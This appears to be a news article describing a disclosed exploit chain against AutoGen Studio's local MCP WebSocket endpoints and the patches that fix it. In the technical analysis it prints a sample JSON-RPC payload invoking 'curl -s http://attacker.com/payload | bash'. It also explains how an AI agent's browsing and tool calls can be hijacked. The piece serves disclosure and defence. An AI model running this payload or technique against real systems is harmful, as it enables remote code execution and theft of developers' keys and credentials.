Microsoft Discloses 'AutoJack' AI Agent RCE Chain Targeting AutoGen Studio
By Vatsal Shah · June 19, 2026 · Cyber Security · Source: Microsoft Security Response Center
AI SUMMARY
- Microsoft Security researchers publicly disclosed 'AutoJack' on June 18, 2026, a critical exploit chain resulting in Remote Code Execution (RCE) on developer machines.
- The vulnerability targets pre-release builds of AutoGen Studio that expose unauthenticated WebSocket endpoints under the
/api/mcp/*path. - By leveraging cross-origin WebSocket hijacking (CSWSH), malicious websites can send commands to local AutoGen services, bypassing standard localhost trust boundaries.
- The exploit allows an attacker to hijack the agent's web browsing actions and execute arbitrary shell commands with the privileges of the local developer.
- Microsoft and the AutoGen team have released an upstream main branch patch enforcing WebSocket token authentication and restricting cross-origin requests.
What Happened
On June 18, 2026, Microsoft Security Response Center (MSRC) published a warning detailing 'AutoJack', a multi-stage exploit chain that allows remote attackers to execute arbitrary code on developer workstations. The vector exploits a vulnerability in the local development server of AutoGen Studio, Microsoft’s popular multi-agent orchestration framework.
The vulnerability stems from the way AutoGen Studio handles local connections. Because developers run AutoGen Studio locally (typically binding to localhost:8081 or similar), the service assumed that any incoming connection from the local machine was trusted. However, Microsoft researchers demonstrated that this localhost trust bypass can be triggered externally. If a developer running AutoGen Studio visits a malicious website or clicks a poisoned link in an agent's browser, the attacker's site can run client-side script in the background. This script opens a connection to the local AutoGen server, bypassing standard cross-origin protection.

Once connected, the exploit utilizes unauthenticated Model Context Protocol (MCP) endpoints. By sending specialized payloads over the WebSockets interface at /api/mcp/*, the attacker can force the AutoGen orchestration engine to execute system commands under the guise of agent tool calls, resulting in full compromise of the developer's system. The AutoGen team has committed a hotfix to the main project branch to enforce strict authorization tokens and CORS controls.
Technical Analysis of the Exploit Chain
The AutoJack vulnerability highlights a major security challenge in the design of agentic tools: the assumption of local network safety. The exploit utilizes three distinct phases to transition from a browser tab to local system execution.
Phase 1: Bypassing Localhost Trust Bounds
Most web browsers block standard HTTP requests from an external public site (e.g., attacker.com) to a local address (e.g., 127.0.0.1:8081) via Cross-Origin Resource Sharing (CORS) rules. However, browsers do not apply the same strict checks to WebSocket connections.
Through Cross-Origin WebSocket Hijacking (CSWSH), a script running on attacker.com can request a WebSocket upgrade targeting ws://127.0.0.1:8081/api/mcp/chat. Because the AutoGen server did not check the Origin header of incoming WebSocket upgrade requests, it accepted the connection from the malicious origin.
Phase 2: The MCP WebSocket Authentication Flaw
The Model Context Protocol (MCP) allows agents to connect to local servers that expose tools, resources, and prompts. In pre-release builds of AutoGen Studio, these MCP interfaces were unauthenticated.
Once the WebSocket connection is established, the attacker sends an MCP JSON-RPC message. The message calls a tool registration method, registering a custom shell execution tool or invoking a pre-existing tool (like execute_command) that runs arbitrary code:
{
"jsonrpc": "2.0",
"method": "tools/call",
"params": {
"name": "execute_command",
"arguments": {
"command": "curl -s http://attacker.com/payload | bash"
}
},
"id": 1
}Phase 3: System Execution
Because the AutoGen Studio server runs with the user permissions of the developer, the command executes locally on the workstation. This grants the attacker access to local environment variables, SSH keys, source repositories, and cloud credentials.

Mitigations and Upstream Patches
Upon receiving the report from Microsoft researchers, the AutoGen maintainers worked quickly to release patches. Developers running AutoGen Studio should upgrade to the latest stable release immediately.
Enforcing Strict Authentication Tokens
The hotfix changes the WebSocket startup logic to require a cryptographically random token. When AutoGen Studio launches, it generates a single-use token and writes it to a local configuration file. All client requests—including WebSocket upgrades—must include this token in the query parameters:
ws://127.0.0.1:8081/api/mcp/chat?token=ab89c892e8fa...
Connections lacking a valid token are immediately rejected, blocking cross-origin attempts because external sites cannot read the local token file.
Restricting the Origin Header
The WebSocket server now validates the Origin header. It only permits connections where the origin matches the configured host (typically localhost or 127.0.0.1), throwing a 403 Forbidden error for external domains.
Implementing Agent Browsing Isolation Gates
To prevent agents from visiting malicious sites that trigger these local vectors, organizations are encouraged to implement isolated browsing gateways. An isolation gate routes agent web browsing traffic through an isolated virtual sandbox, preventing scripts from accessing the developer's local loopback interface.

Why It Matters
The Risk of Agentic Tooling Sprawl
The AutoJack disclosure highlights a growing risk in enterprise AI deployments: the security debt associated with local developer tools. As organizations rush to adopt frameworks like AutoGen and LangGraph, developers are running unauthenticated API services on their local machines, expanding the corporate attack surface.
This trend is part of a broader rise in security vulnerabilities, as detailed in our coverage of AI Agent Security Incidents (88% Rise) and the updated OWASP Agentic AI Security Governance 2.0 guidelines.
Bypassing Localhost Assumptions
Many developer tools treat localhost as a safe zone, assuming that only local users can access it. AutoJack shows that this assumption is flawed. Any local service that does not validate origins, enforce authentication, or restrict WebSocket upgrades can be exploited remotely via browser-based vectors.
To help security teams audit and mitigate these risks, we have built a comprehensive governance framework in our playbook on Surviving Shadow AI & Architecting Enterprise Governance.
What to Watch Next
- Broadening Security Audits: Security researchers are auditing other popular agent frameworks (including CrewAI, Semantic Kernel, and LangChain templates) for similar cross-origin WebSocket weaknesses.
- Enterprise Restrictions on Local Servers: Expect corporate security teams to block unauthenticated local loopback servers on developer workstations, mandating centralized, audited developer environments.
- Model Context Protocol (MCP) Evolution: The MCP working group is drafting standard security models to enforce token authentication and encrypted connections across all host-client interactions.
Source
Microsoft Security Response Center — AutoJack Exploitation Report (Jun 18, 2026)
Additional references: Cloud Security Alliance AI Safety Initiative
Related on shahvatsal.com:
- OWASP Agentic AI Security Governance 2.0
- AI Agent Security Incidents Up 88% in Production
- Handling Agentic Memory and State Failure in Production
- Surviving Shadow AI: Architecting Enterprise Governance